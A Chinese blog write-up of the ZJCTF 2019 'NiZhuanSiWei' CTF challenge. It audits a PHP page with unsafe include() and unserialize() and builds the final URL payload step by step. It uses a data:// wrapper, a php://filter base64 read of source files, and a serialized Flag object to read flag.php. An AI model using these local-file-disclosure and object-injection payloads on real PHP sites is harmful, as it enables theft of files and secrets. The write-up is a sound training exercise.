[ZJCTF 2019]NiZhuanSiWei

最新推荐文章于 2023-11-15 08:00:00 发布

c4fx

最新推荐文章于 2023-11-15 08:00:00 发布

阅读量519

点赞数

分类专栏： CTF题目笔记文章标签： php

本文链接：https://blog.csdn.net/weixin_52116519/article/details/124347910

版权

CTF题目笔记专栏收录该内容

37 篇文章 6 订阅

订阅专栏

1、代码审计
在这里插入图片描述 2、简化源码

get 传参 text file password
if((file_get_contents($text,'r')==="welcome to the zjctf")){
    if(preg_match("/flag/",$file)){
    }
    else{
        include($file);  //useless.php
        $password = unserialize($password);
        echo $password;
    }
}

3、分析
我们必须在服务器中找到一个内容为welcome to the zjctf的文件x，让text=x，但是这大概率找不到。只能绕过了。

①、

在这里插入图片描述

②、

在这里插入图片描述 4、继续分析
useless.php 不回显，那就用伪协议输出。
file=php://filter/read=convert.base64-encode/resource=useless.php
5、base64解码得到

<?php  
class Flag{  //flag.php  
    public $file;  
    public function __tostring(){  
        if(isset($this->file)){  
            echo file_get_contents($this->file); 
            echo "<br>";
        return ("U R SO CLOSE !///COME ON PLZ");
        }  
    }  
}  
?>

6、PHP序列化 - 在线代码运行

<?php  
class Flag{
    public $file="flag.php";  
}  
$a=new Flag();
echo serialize($a);
?> 

O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}

7、最终的payload
/?text=data://text/plain,welcome to the zjctf&file=useless.php&password=O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}
file必须为useless.php，这样才会被include进主页面。不然反序列化的Flag类就无法找到。
在这里插入图片描述

c4fx

关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
[ZJCTF 2019]NiZhuanSiWei

1、代码审计2、简化源码get 传参 text file passwordif((file_get_contents($text,'r')==="welcome to the zjctf")){ if(preg_match("/flag/",$file)){ } else{ include($file); //useless.php $password = unserialize($password); echo $passwo
复制链接

扫一扫